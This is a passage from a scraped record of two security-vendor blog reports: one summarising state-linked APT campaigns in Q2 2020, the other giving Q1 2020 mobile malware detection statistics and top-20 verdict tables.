certitude that the ARCHER hack and the incidents described by EGI-CSIRT are related, we suspect they might be. Some media speculated that all these attacks might be related to COVID-19 research being carried out at the supercomputing centers.\n\nInterestingly, last July 16th 2020, NCSC [published](<https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf>) an advisory describing malicious activity targeting institutions related to research to find a vaccine for COVID-19. In this case, the malware used in the attacks belongs to a family called WellMess, as [originally described](<https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf>) by LAC Co back in 2018. Until recently, this malware was not believed to be related to any APT activity. Surprisingly, NCSC attributes this activity to the APT-29 threat actor. However, it does not provide any public proof.\n\nFrom our own research, we can confirm that WellMess&#x27;s activity seems to follow a cycle, being used in campaigns every three months or so since its discovery. We observed a peak of activity in fall of 2019, followed by an increase in the number of C2s in February 2020. We also observed high-profile targeting, including telcos, government and contractors in MENA and the EU. However, from our side we cannot confirm attribution or targeting of health institutions at the moment.\n\nFor more details about WellMess, you can check our presentation from GReAT ideas here: <https://youtu.be/xeTYLRCwnFo>\n\n## **Russian-speaking activity**\n\nIn May, researchers at Leonardo published a report about &quot;Penquin_x64&quot;, a previously undocumented variant of Turla&#x27;s Penquin GNU/Linux backdoor. Kaspersky has publicly documented the Penquin family, tracing it back to its Unix ancestors in the Moonlight Maze operation of the 1990s. We followed up on this latest research by generating network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover that tens of internet hoster&#x27;s servers in Europe and the US are still compromised today. We think it&#x27;s possible that, following public disclosure of Turla&#x27;s GNU/Linux tools, the Turla threat actor may have been repurposing Penquin to conduct operations other than traditional intelligence.\n\nIn June, we discovered two different domain names, &quot;emro-who[.]in&quot; and &quot;emro-who[.]org&quot;, typo-squatting the World Health Organization (WHO) Regional Office for the Eastern Mediterranean (EMRO). These domains, registered on June 21 using the Njalla.no registrar, seem to be used as sender domains for a spear-phishing campaign. This type of typo-squatting is reminiscent of Sofacy campaigns against other international organizations. Moreover, we have seen Njalla.no recently used to register SPLM and XTUNNEL C2 (command-and-control) servers and we have seen this autonomous system used by Sofacy in the past for a SPLM C2.\n\nHades is an elusive, highly dynamic threat actor that commonly engages in tailored hacking and special access operations, such as the [OlympicDestroyer](<https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/>) attack or the [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) (aka NotPetya) and Badrabbit attacks. On May 28, the US National Security Agency (NSA) [published an alert](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2196511/exim-mail-transfer-agent-actively-exploited-by-russian-gru-cyber-actors/>) detailing the use by Hades of an Exim vulnerability (CVE-2019-10149) for what appears to be a potentially large hacking operation designed for mass access. Our own report expanded on the scripts used in this operation, as well as providing other IoCs that we discovered.\n\n## **Chinese-speaking activity**\n\nIn late 2019, and again in March this year, we described ongoing malicious activities from a previously unknown threat actor that we named [Holy Water](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>). Holy Water notably leveraged a Go language and Google Drive-command-driven implant that we dubbed Godlike12. Following the publication of our report, and notifications to relevant incident response organizations, new Holy Water samples were submitted to VirusTotal. The newly discovered samples include Telegram-controlled and open-source-based Python implants that were probably deployed on the victim&#x27;s networks after a successful intrusion.\n\nIn March, one of our YARA rules from previous research on ShadowPad attacks detected a recently compiled executable file uploaded to VirusTotal. Later we found a few other samples from our own telemetry. ShadowPad is a modular attack platform consisting of a root module and various plugin modules responsible for diverse functionalities. ShadowPad was first discovered by Kaspersky in 2017. In August of that year, one of our customers detected suspicious network activities. After thorough investigation, we found a legitimate software module that had been compromised and backdoored by an advanced threat actor in a sophisticated software supply-chain attack. We notified the software vendor and also [published the outcome of our investigations in a technical white paper](<https://securelist.com/shadowpad-in-corporate-networks/81432/>). Since then, ShadowPad malware has been deployed in a number of major cyberattacks, with a different subset of plugins used in different attack cases: the CCleaner incident in 2017 and the [ShadowHammer ](<https://securelist.com/operation-shadowhammer/89992/>)attacks in 2018 are the major examples of such attacks.\n\nWhen analyzing new samples from ShadowPad malware, compiled and used in attacks since late 2019, our investigation revealed a strong connection between these recent ShadowPad malware samples and the CactusPete threat actor. CactusPete started deploying ShadowPad malware to a few victims at the beginning of 2019 through its HighProof backdoor. However, since late 2019, ShadowPad has been commonly used in CactusPete attacks.\n\nThis quarter, we described another CactusPete attack campaign which started in December 2019 In this campaign, the CactusPete threat actor used a new method to drop an updated version of the DoubleT backdoor onto the computers. The attackers implanted a new dropper module in the Microsoft Word Startup directory, most likely through a malicious document. This malicious dropper is responsible for dropping and executing a new version of the DoubleT backdoor, which utilizes a new method of encrypting the C2 server address.\n\nWhile analysing compromised machines in Central Asia, we revealed an additional infection that was unrelated to the initial subject of our investigation. This led us to detect previously unknown malware that we dubbed B&amp;W, which provides an attacker with the capabilities to remotely control a victim&#x27;s machine. Further analysis of the samples, infrastructure and other related artefacts allowed us to conclude, with medium confidence, that the newly found malware is related to the SixLittleMonkeys APT. This group is known to have been active for several years, targeting government entities in Central Asia.\n\nHoneyMyte is an APT threat actor that we have been tracking for several years. In February, our fellow researchers at Avira blogged about HoneyMyte PlugX variants that they had recently observed targeting Hong Kong. PlugX has been used by multiple APT groups over the past decade, especially shared among Chinese-speaking threat actors, and has changed in many ways. Avira\u00b4s post covers the PlugX loader and backdoor payload, including its USB capabilities. In May, we published an update on this threat actor, specifically providing timely indicators to aid in threat hunting for some of the PlugX variants found in the wild between January and May this year.\n\nIn May, we discovered a watering hole on the website of a Southeast Asian top official. This watering hole, set up in March, seemed to leverage whitelisting and social engineering techniques to infect its targets. The final payload was a simple ZIP archive containing a readme file prompting the victim to execute a CobaltStrike implant. The mechanism used to execute CobaltStrike was DLL side-loading, which decrypted and executed a CobaltStrike stager shellcode. Analysis of the code, the infrastructure and the victimology led us to attribute this watering-hole, with high confidence, to the HoneyMyte APT threat actor.\n\nQuarian is a little-known malicious program that Chinese-speaking actors have used since around 2012. We hadn&#x27;t spotted any further activity until we observed a resurgence in an attack by the Icefog group in 2019. We tracked the activity of the malware following this and noticed a new variant that was used during several attacks on Middle Eastern and African governments during 2020. In one case, we could see that this variant was deployed following exploitation of the CVE-2020-0688 vulnerability on the network of a government entity. This vulnerability, which was publicly reported in February 2020, allows an authenticated user to run commands as SYSTEM on a Microsoft Exchange server. In this case, the server was indeed compromised and was hosting the ChinaChopper webshell, which was used to obtain, and later launch, the Quarian and PlugX backdoors. Our analysis led us to assume, with medium to high confidence, that the group behind these attacks is one we track under the name CloudComputating - a Chinese-speaking actor that, based on previous reports, has targeted high-profile Middle Eastern diplomatic targets.\n\nIn March, researchers at Check Point Research published a [report](<https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/>) describing an APT campaign that targeted Mongolia&#x27;s public sector and leveraged a coronavirus-themed lure to conduct its initial intrusion. We were able to discover further samples and another COVID-themed document with the same targeting, as well as additional targets in Russia. We attribute this activity with medium confidence to IronHusky.\n\n## **Middle East**\n\nThe MuddyWater APT was discovered in 2017 and has been active in the Middle East ever since. In 2019, we reported activity against telecoms providers in Iraq and Iran, as well as government bodies in Lebanon. We recently discovered MuddyWater using a new C++ toolchain in a new wave of attacks in which the actor leveraged an open-source utility called Secure Socket Funneling for lateral movement.\n\nAt the end of May, we observed that Oilrig had included the DNSExfitrator tool in its toolset. It allows the threat actor to use the DNS over HTTPS (DoH) protocol. Use of the DNS protocol for malware communications is a technique that Oilrig has been using for a long time. The difference between DNS- and DoH-based requests is that, instead of plain text requests to port 53, they would use port 443 in encrypted packets. Oilrig added the publicly available DNSExfiltrator tool to its arsenal, which allows DoH queries to Google and Cloudflare services. This time, the operators decided to use subdomains of a COVID-related domain which are hardcoded in the DNSExfitrator detected samples.\n\n## **South\u0435ast Asia and Korean Peninsula**\n\nBlueNoroff is one of the most prolific financially motivated APT actors and we have published several reports of BlueNoroff campaigns targeting financial institutions. Recently, we uncovered another campaign that has been active since at least 2017. In this campaign, the group sends spear-phishing emails containing an archived Windows shortcut file. The file names are disguised as security or cryptocurrency related files in order to entice users into executing them. The infection chain started from this shortcut file is a complex multi-stage infection procedure. Before delivering the Windows executable payload, the actor uses two VBS and three PowerShell scripts in order to collect system information. The actor very carefully delivers the final payload only to the intended targets. The backdoor payload also utilizes a multi-stage infection procedure. The actor uses it to control infected hosts and implants additional malware for surveillance. These malicious programs are responsible for stealing the user&#x27;s keystrokes and saving a screenshot of the infected machine. The main targets of this campaign are financial institutions, such as cryptocurrency businesses, and fintech companies. We identified diverse victims from 10 countries, as well as more potential victims from open source intelligence.\n\nThe Lazarus group has been a major threat actor for several years. Alongside goals like cyber-espionage and cyber-sabotage, this threat actor has targeted banks and other financial companies around the globe. The group continues to be very active. We recently observed the Lazarus group attacking a software vendor in South Korea using Bookcode, malware that we evaluate to be a Manuscrypt variant, utilizing a watering-hole attack to deliver it. Manuscrypt is one of the Lazarus group&#x27;s tools that is actively being updated and used. The group attacked the same victim twice. Almost a year prior to compromising this victim, Lazarus attempted to infect it by masquerading as a well-known security tool, but failed. We were able to construct the group&#x27;s post-exploitation activity, identifying various freeware and red-teaming tools used. Although Lazarus has recently tended to focus more on targeting the financial industry, we believe that in this campaign they were seeking to exfiltrate intellectual property. We also observed that they previously spread Bookcode using a decoy document related to a company working in the defense sector. Based on our observations, we evaluate that the Bookcode malware is being used exclusively for cyber-espionage campaigns.\n\nIn April, we released an early warning about the VHD ransomware, which was first spotted in late March. This ransomware stood out because of its self-replication method. The use of a spreading utility compiled with victim-specific credentials was reminiscent of APT campaigns, but at the time we were unable to link the attack to an existing group. However, Kaspersky was able to identify an incident in which the VHD ransomware was deployed, in close conjunction with known Lazarus tools, against businesses in France and Asia. This indicates that Lazarus is behind the VHD ransomware campaigns that have been documented so far. As far as we know, this is also the first time it has been established that the Lazarus group has resorted to targeted ransomware attacks for financial gain.\n\nLast year we created a private report on a malware framework that we named MATA, which we attribute, with low confidence, to the Lazarus group. This framework included several components, such as a loader, orchestrator and plug-ins. Initially, this framework targeted Windows and Linux. However, in April we discovered a suspicious macOS file uploaded to VirusTotal using a rule to detect the MATA malware framework. After looking into this malware, we confirmed that it was a macOS variant of the MATA malware. The malware developers Trojanized an open-source two-factor authentication application and utilized another open-source application template. While investigating, to find more solid evidence for attribution, we found an old Manuscrypt strain that used a similar configuration structure. We also discovered a cluster of C2 servers probably related to this campaign.\n\nThe MATA framework was not the only way that Lazarus targeted macOS. We also observed a cluster of activity linked to [Operation ](<https://securelist.com/operation-applejeus-sequel/95596/>)[AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>). The other was similar to the macOS malware used in a campaign that we call TangDaiwbo. This is a multi-platform cryptocurrency exchange campaign: Lazarus utilizes macro-embedded Office documents and spreads PowerShell or macOS malware, depending on the victim&#x27;s system.\n\nEarly this year, we reported improvements in a Lazarus campaign targeting a cryptocurrency business. In this campaign, Lazarus adopted a downloader that sends compromised host information and selectively fetches the next-stage payload. Recently, we identified a Lazarus campaign with similar strategies, but targeting academic and automotive sectors. Lazarus also adopted new methods to deliver its tools. First of all, the group elaborated its weaponized document by adopting remote template injection techniques. Previously, Lazarus delivered macro-embedded documents to the victim, but the group has now applied one more stage to hinder detection. The group also utilized an open-source PDF reader named Sumatra PDF to make Trojanized applications. They created a Trojanized PDF reader, sending it to the victim with a crafted PDF file. If the victim opens this file, the Trojanised PDF viewer implants malicious files and shows decoy documents to deceive the victim. The actor delivers the final payload very carefully, and executes it in memory. Fortunately, we were able to get the final payload and confirm that it was a Manuscrypt variant that we had already described. We also found that it&#x27;s the same malware variant that the US CISA (Cybersecurity and Infrastructure Security Agency) recently reported, named COPPERHEDGE.\n\nFollowing our report describing the long-standing [PhantomLance](<https://securelist.com/apt-phantomlance/96772/>) campaign in Southeast Asia, we published a private report providing detailed attribution based on discovered overlaps with reported campaigns of the OceanLotus APT. In particular, we found multiple code similarities with the previous Android campaign, as well as similarities in macOS backdoors, infrastructure overlap with Windows backdoors and a couple of cross-platform resemblances. Based on our research, we believe, with medium confidence, that PhantomLance is a modern Android campaign conducted by OceanLotus. Apart from the attribution details, we described the actor&#x27;s spreading strategy using techniques to bypass app market filters. We also provided additional details about samples associated with previously reported suspected infrastructure, as well as the latest sample deployed in 2020 that uses Firebase to decrypt its payload.\n\nAdditionally, OceanLotus has been using new variants of its multi-stage loader since the second half of 2019. The new variants use target-specific information (username, hostname, etc.) of the targeted host that they obtained beforehand, in order to ensure their final implant is deployed on the right victim. The group continues to deploy its backdoor implant, as well as Cobalt Strike Beacon, configuring them with updated infrastructure.\n\n## **Other interesting discoveries**\n\nThe Deceptikons APT is a long-running espionage group believed to have been providing mercenary services for almost a decade now. The group is not technically sophisticated and has not, to our knowledge, deployed zero-day exploits. The Deceptikons infrastructure and malware set is clever, rather than technically advanced. It is also highly persistent and in many ways reminds us of WildNeutron. Deceptikon&#x27;s repeated targeting of commercial and non-governmental organizations is somewhat unusual for APT actors. In 2019, Deceptikons spear-phished a set of European law firms, deploying PowerShell scripts. As in previous campaigns, the actor used modified LNK files requiring user interaction to initially compromise systems and execute a PowerShell backdoor. In all likelihood, the group&#x27;s motivations included obtaining specific financial information, details of negotiations, and perhaps even evidence of the law firms&#x27; clientele.\n\nMagicScroll (aka AcidBox) is the name we&#x27;ve given to a sophisticated malware framework, whose main purpose is to decrypt and load an arbitrary payload in kernel mode. The framework consists of several stages. The first stage is a Windows security provider that is loaded by the system on boot and executed in user mode. This decrypts and runs a second payload, which is physically stored in the registry. Although we weren&#x27;t able to find a victim with this second stage, we were able to find a file that matches the expected format of the second stage. This second stage payload utilizes a well-known vulnerability in a VirtualBox driver (CVE-2008-3431) to load the third stage, which is designed to run in kernel mode. The kernel mode payload is decrypted from a resource from the second stage, using the key retrieved from the registry. Unfortunately, we couldn&#x27;t find a decryption key to decrypt the third stage payload, so we don&#x27;t know what the last part of this malware framework looks like. Although the code is quite sophisticated, we couldn&#x27;t identify any similarity with other known frameworks.\n\nAarogya Setu is the name of a mandatory COVID-19 mobile tracking app developed by the National Informatics Centre, an organization that comes under the Ministry of Electronics and Information Technology in India. It allows its users to connect to essential health services in India. With cyber criminals and APT actors taking advantage of pandemic-tracking applications to distribute Trojanized mobile apps, we investigated and identified apps that mimic the appearance and behavior of the legitimate Aarogya Setu app while deploying Android RATs. We consider one of these to be a new version of a RAT that we previously reported being used by the Transparent Tribe threat actor.\n\n## **Final thoughts**\n\nThe threat landscape isn&#x27;t always full of &quot;groundbreaking&quot; events. However, a review of the activities of APT threat actors indicates that there are always interesting developments. Our regular quarterly reviews are intended to highlight these key developments.\n\nHere are the main trends that we&#x27;ve seen in Q2 2020.\n\n * Geo-politics remains an important motive for some APT threat actors, as shown in the activities of MuddyWater, the compromise of the Middle East Eye website and the campaigns of CloudComputating and HoneyMyte groups.\n * As is clear from the activities of Lazarus and BlueNoroff, financial gain is another driver for some threat actors - including the use of ransomware attacks.\n * While Southeast Asia continues to be an active region for APT activities, this quarter we have also observed heavy activity by Chinese-speaking groups, including ShadowPad, HoneyMyte, CactusPete, CloudComputating and SixLittleMonkeys.\n * APT threat actors continue to exploit software vulnerabilities - examples this quarter include Hades and MagicScroll.\n * We have noted before that the use of mobile implants is no longer a novelty, and this quarter is no exception, as illustrated by the PhantomLance campaign.\n * It is clear that APT actors, like opportunistic cybercriminals, continue to exploit the COVID-19 pandemic as a theme to lure potential victims. However, we would note once again that this doesn&#x27;t represent a shift in TTPs.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-07-29T10:00:09", "published": "2020-07-29T10:00:09", "id": "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "href": "https://securelist.com/apt-trends-report-q2-2020/97937/", "type": "securelist", "title": "APT trends report Q2 2020", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-20T11:49:25", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-17026", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0729", "CVE-2020-0767", "CVE-2020-0796", "CVE-2020-6418"], "description": "\n\n_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.\n * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.\n * Ransomware attacks were defeated on the computers of 178,922 unique users.\n * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 1,152,662 malicious installation packages\n * 42,115 installation packages for mobile banking trojans\n * 4339 installation packages for mobile ransomware trojans\n\n## Mobile threats\n\n### Quarter events\n\nQ1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for \u20ac0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.\n\nAnother interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.\n\nThe third piece of malware that caught our attention this reporting quarter was trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the changes of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.\n\n### Mobile threat statistics\n\nIn Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.\n\n_Number of malicious installation packages detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_\n\nStarting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_\n\nOf all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).\n\nPotentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.\n\nIn third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.\n\nIt is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.89 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.09 \n3 | DangerousObject.AndroidOS.GenericML | 7.08 \n4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 \n5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 \n6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 \n7 | Trojan.AndroidOS.Handda.san | 2.31 \n8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 \n9 | Trojan.AndroidOS.Necro.a | 2.19 \n10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 \n11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 \n12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 \n13 | Exploit.AndroidOS.Lotoor.be | 1.46 \n14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 \n15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 \n16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 \n18 | Trojan.AndroidOS.Dvmap.a | 1.24 \n19 | Trojan.AndroidOS.Agent.rt | 1.21 \n20 | Trojan.AndroidOS.Vdloader.a | 1.18 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._\n\nFirst place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). They are triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7,08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nIn fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.\n\nTrojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.\n\nSixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.\n\nThe verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.\n\nTrojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.\n\n### Geography of mobile threats\n\n \n\n_Map of infection attempts by mobile malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194110/sl_malware_report_03-en-mobile-all-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile threats**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Iran | 39.56 \n2 | Algeria | 21.44 \n3 | Bangladesh | 18.58 \n4 | Nigeria | 15.58 \n5 | Lebanon | 15.28 \n6 | Tunisia | 14.94 \n7 | Pakistan | 13.99 \n8 | Kuwait | 13.91 \n9 | Indonesia | 13.81 \n10 | Cuba | 13.62 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.\n\n### Mobile banking trojans\n\nDuring the reporting period, we detected **42,115** installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.\n\n_Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194342/sl_malware_report_04-kolichestvo-ustanovochnyh-paketov-mobilnyh-bankovskih-troyancev-q1-2019-q1-2019.png>)_\n\n**Top 10 mobile banking trojans**\n\n_ _ | **Verdict** | **%*** \n---|---|--- \n_1_ | Trojan-Banker.AndroidOS.Rotexy.e | 13.11 \n_2_ | Trojan-Banker.AndroidOS.Svpeng.q | 10.25 \n_3_ | Trojan-Banker.AndroidOS.Asacub.snt | 7.64 \n_4_ | Trojan-Banker.AndroidOS.Asacub.ce | 6.31 \n_5_ | Trojan-Banker.AndroidOS.Agent.eq | 5.70 \n_6_ | Trojan-Banker.AndroidOS.Anubis.san | 4.68 \n_7_ | Trojan-Banker.AndroidOS.Agent.ep | 3.65 \n_8_ | Trojan-Banker.AndroidOS.Asacub.a | 3.50 \n_9_ | Trojan-Banker.AndroidOS.Asacub.ar | 3.00 \n_10_ | Trojan-Banker.AndroidOS.Agent.cf | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats._\n\nFirst and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).\n\nThird, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.\n\n_Geography of mobile banking threats, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194517/sl_malware_report_05-en-mobile-banker-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile banking trojans**\n\n| Country* | %** \n---|---|--- \n1 | Japan | 0.57 \n2 | Spain | 0.48 \n3 | Italy | 0.26 \n4 | Bolivia | 0.18 \n5 | Russia | 0.17 \n6 | Turkey | 0.13 \n7 | Tajikistan | 0.13 \n8 | Brazil | 0.11 \n9 | Cuba | 0.11 \n10 | China | 0.10 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.\n\nIn second place came Spain (0.48%), where in more than half of all cases, we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.\n\nThird place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.\n\nIt is worth saying a bit more about the Cebruser family. Its creators were among the first to exploit the coronavirus topic to spread the malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13183112/sl_malware_report.png>)When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.\n\nThe malware is distributed under the [Malware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) model; its set of functions is standard for such threats, but with one interesting detail \u2014 the use of a step-counter for activation so as to bypass dynamic analysis tools ([sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.\n\n### Mobile ransomware trojans\n\nIn Q2 2020, we detected **4,339** installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.\n\n_Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194615/sl_malware_report_06-kolichestvo-ustanovochnyh-paketov-mobilnyh-troyancev-vymogatelej-q1-2018-q1-2019.png>)_\n\n**Top 10 mobile ransomware trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 17.08 \n2 | Trojan-Ransom.AndroidOS.Congur.e | 12.70 \n3 | Trojan-Ransom.AndroidOS.Small.as | 11.41 \n4 | Trojan-Ransom.AndroidOS.Rkor.k | 9.88 \n5 | Trojan-Ransom.AndroidOS.Small.as | 7.32 \n6 | Trojan-Ransom.AndroidOS.Small.o | 4.79 \n7 | 